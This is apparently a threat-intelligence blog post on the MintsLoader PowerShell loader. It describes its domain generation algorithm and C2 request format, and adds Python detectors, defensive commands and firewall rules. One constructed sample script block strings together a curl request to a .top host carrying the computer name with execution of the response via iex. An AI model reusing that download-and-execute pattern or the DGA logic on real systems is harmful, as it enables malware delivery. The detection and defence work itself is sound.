2025-02-13
In early January 2025, researchers identified a malicious campaign involving MintsLoader, a PowerShell-based malware loader. This loader was observed delivering secondary payloads such as the Stealc information stealer and the Berkeley Open Infrastructure for Network Computing (BOINC) client. The initial infection vector involved spam emails containing links to malicious pages or attached JScript files. Upon execution, these scripts initiated a sequence leading to the download and execution of MintsLoader.
Notably, MintsLoader employs a Domain Generation Algorithm (DGA) to create dynamic C2 domains, enhancing its ability to evade detection. Additionally, it incorporates anti-virtual machine techniques to avoid analysis in sandbox environments. The campaign primarily targeted organizations in the United States and Europe, including sectors such as Electricity, Oil & Gas, and Legal Services.
ADAPTIVE C2 STRATEGY
MintsLoader's DGA derives its seed value from the current day of the month plus a constant. A loop then runs 15 times, and on each iteration the output of the System[.]Random object's Next method is used as an index into the character array “abcdefghijklmn”, building the domain one character at a time. Finally, the TLD of the C2 server ([.]top) is appended to the resulting C2 domain.
A 10-character string is then built from a random alphanumeric character array using the Get-Random cmdlet; this string forms part of the full C2 URI path.
The query parameters are built as follows: the computer name, read from the ComputerName environment variable, becomes the value of the id parameter; the previously mentioned $key variable becomes the value of the key parameter; and the s parameter carries a hard-coded number, e.g., 527.
The curl command is used again to send the request to the C2, and the C2's response is again executed via iex.
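The C2 request shape described above (a 15-letter host drawn only from a-n under .top, a 10-character random path segment, and id/key/s query parameters) is structural enough to match in proxy logs. The following Python is an added example, not code from the report or from the malware: it scores URLs against that shape and runs over a few constructed proxy log lines. The log format (timestamp, client, method, URL), the sample hosts and the PLACEHOLDERKEY value are all invented for the example; the scoring weights and the threshold are this example's choices, not figures from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shape of the DGA output as described in the report: 15 characters chosen
# from "abcdefghijklmn", followed by the .top TLD.
DGA_ALPHABET = "abcdefghijklmn"
DGA_LENGTH = 15
DGA_TLD = "top"
DGA_LABEL_RE = re.compile(rf"^[{DGA_ALPHABET}]{{{DGA_LENGTH}}}$")

# The URI path contains a 10-character random alphanumeric segment.
RANDOM_SEGMENT_RE = re.compile(r"^[A-Za-z0-9]{10}$")


def looks_like_dga_host(host):
    """True when host is exactly <15 letters from a-n>.top."""
    labels = host.lower().split(".")
    return (len(labels) == 2
            and labels[1] == DGA_TLD
            and DGA_LABEL_RE.match(labels[0]) is not None)


def score_url(url):
    """Return (score, reasons): how many MintsLoader C2 traits the URL shows."""
    parts = urlsplit(url)
    reasons = []
    if looks_like_dga_host(parts.hostname or ""):
        reasons.append("dga-shaped .top host")
    if any(RANDOM_SEGMENT_RE.match(seg) for seg in parts.path.split("/") if seg):
        reasons.append("10-char random path segment")
    query = parse_qs(parts.query)
    if {"id", "key", "s"}.issubset(query):
        reasons.append("id/key/s query parameters")
        if query["s"][0].isdigit():
            reasons.append("numeric s parameter")
    return len(reasons), reasons


# Constructed proxy log lines (not real traffic): "<timestamp> <client> <method> <url>".
# The key value is a placeholder; the report does not publish real keys.
SAMPLE_LOG = [
    "2025-01-08T10:15:02Z 10.0.0.5 GET http://abkdjfhnmliecag.top/Qx7Lp2Vt9k/?id=WS-FIN-07&key=PLACEHOLDERKEY&s=527",
    "2025-01-08T10:15:03Z 10.0.0.5 GET https://www.example.com/index.html",
    "2025-01-08T10:16:11Z 10.0.0.9 GET http://cdn.example.top/assets/app.js",
    "2025-01-08T10:17:40Z 10.0.0.12 GET http://update.example.net/dl/?id=123&key=abc&s=9",
]


def scan_log(lines, threshold=3):
    """Return the log entries whose URL scores at or above the threshold."""
    hits = []
    for line in lines:
        timestamp, client, method, url = line.split()
        score, reasons = score_url(url)
        if score >= threshold:
            hits.append({"time": timestamp, "client": client, "url": url,
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["score"], "; ".join(hit["reasons"]))
```

A legitimate .top site with a normal hostname (third line) and an unrelated download URL that happens to use id/key/s parameters (fourth line) each score below the threshold, while the first line matches on all four traits. The letter-set check is the strongest single trait, since ordinary domains rarely consist solely of the first fourteen letters of the alphabet.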
Report: https://lnkd.in/d7_SVwSa
What Undercode Say
MintsLoader represents a sophisticated evolution in malware tactics, leveraging PowerShell’s flexibility and the inherent randomness of Domain Generation Algorithms (DGAs) to maintain persistence and evade detection. The use of DGAs is particularly concerning as it allows the malware to dynamically generate command-and-control (C2) domains, making it harder for traditional security measures to block malicious traffic. The integration of anti-VM techniques further complicates analysis, as it prevents researchers from studying the malware in controlled environments.
To defend against such threats, organizations should adopt a multi-layered security approach. This includes deploying advanced threat detection systems capable of identifying and mitigating PowerShell-based attacks, as well as implementing robust email filtering solutions to block phishing attempts. Additionally, regular employee training on recognizing suspicious emails and attachments is crucial.
From a technical standpoint, understanding the inner workings of MintsLoader can aid in developing countermeasures. For instance, monitoring PowerShell activity for unusual patterns, such as the use of Get-Random or System[.]Random, can help detect potential malware execution. Similarly, tracking outbound network traffic for connections to newly registered domains or unusual TLDs like .top can provide early warning signs of compromise.
Here are some practical commands and techniques to enhance your cybersecurity posture:
1. Monitor PowerShell Activity:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -match "Get-Random" }
2. Block Suspicious TLDs:
iptables -A OUTPUT -p tcp --dport 80 -m string --string ".top" --algo bm -j DROP
3. Analyze Network Traffic:
tcpdump -i eth0 -n -A 'tcp port 80' | grep -E '\.top'
4. Detect Anti-VM Techniques:
Get-WmiObject -Query "SELECT * FROM Win32_ComputerSystem" | Select-Object Model, Manufacturer
5. Enhance Email Security:
postconf -e "smtpd_recipient_restrictions = reject_unauth_destination, check_policy_service unix:private/policy"
6. Sandbox Analysis:
cuckoo submit --url http://example.com/malicious.js
7. Harden System Environment:
sysctl -w kernel.randomize_va_space=2
8. Monitor Environment Variables:
Get-ChildItem Env: | Where-Object { $_.Name -eq "ComputerName" }
9. Block Curl Commands:
iptables -A OUTPUT -p tcp --dport 80 -m string --string "curl" --algo bm -j DROP
10. Regular System Audits:
lynis audit system
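Items 1 and 8 above each look for a single string. Matching on Get-Random alone produces many false positives, because administrators use it legitimately; the loader is better characterised by the combination the report describes: System[.]Random, Get-Random, the ComputerName environment variable, curl, iex and a .top host appearing together in one script block. The following Python is an added example, not code from the report or from any vendor tool: it scores script-block text (for instance the Message field exported from the Microsoft-Windows-PowerShell/Operational log) against those indicators. The weights, the threshold and the three sample script blocks are constructed for the example; the "loader-like" sample only contains the indicator strings and is not a functioning script.

```python
import re

# Indicators taken from the report's description of MintsLoader, with example
# weights: execution of downloaded content (iex) and the .NET Random object
# used by the DGA weigh more than the individually common Get-Random cmdlet.
INDICATORS = [
    ("System.Random",       re.compile(r"System\.Random", re.I),                 2),
    ("Get-Random",          re.compile(r"\bGet-Random\b", re.I),                 1),
    ("env:ComputerName",    re.compile(r"env:ComputerName", re.I),               1),
    ("curl/Invoke-WebRequest", re.compile(r"\b(curl|Invoke-WebRequest|iwr)\b", re.I), 1),
    ("iex/Invoke-Expression",  re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    (".top host",           re.compile(r"\.top\b", re.I),                        1),
]


def score_script_block(text):
    """Return (score, matched indicator names) for one script block's text."""
    matched = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in matched)
    return score, matched


def triage(blocks, threshold=4):
    """Return [(block_id, score)] for blocks at or above the threshold, highest first."""
    flagged = []
    for block_id, text in blocks.items():
        score, _ = score_script_block(text)
        if score >= threshold:
            flagged.append((block_id, score))
    return sorted(flagged, key=lambda item: item[1], reverse=True)


# Constructed sample script blocks (not real captured scripts). The loader-like
# sample merely contains the indicator strings side by side; $seed, $dom, $p
# and $key are undefined placeholders and the block does nothing if run.
SAMPLE_BLOCKS = {
    "admin-script": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }",
    "random-only": "$n = Get-Random -Minimum 1 -Maximum 100",
    "loader-like": (
        "$rng = New-Object System.Random($seed)\n"
        "$h = $env:ComputerName\n"
        "$resp = curl \"http://$dom.top/$p/?id=$h&key=$key&s=527\"\n"
        "iex $resp"
    ),
}


if __name__ == "__main__":
    for block_id, text in SAMPLE_BLOCKS.items():
        score, matched = score_script_block(text)
        print(f"{block_id}: score={score} matched={matched}")
    print("flagged:", triage(SAMPLE_BLOCKS))
```

In practice the blocks would come from event ID 4104 entries (script block logging must be enabled for those to exist), so this complements rather than replaces item 1. The string-matching firewall rules in items 2 and 9 only see plaintext port 80 traffic and will also drop legitimate requests containing those strings, which is another reason to score on the host side as well.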
By combining these technical measures with a proactive security strategy, organizations can better defend against advanced threats like MintsLoader. Continuous monitoring, regular updates, and a culture of security awareness are essential components of a robust cybersecurity framework.
For further reading and resources, consider the following links:
– MITRE ATT&CK Framework
– SANS Institute Malware Analysis
– OWASP PowerShell Security
Stay vigilant and keep your systems secure.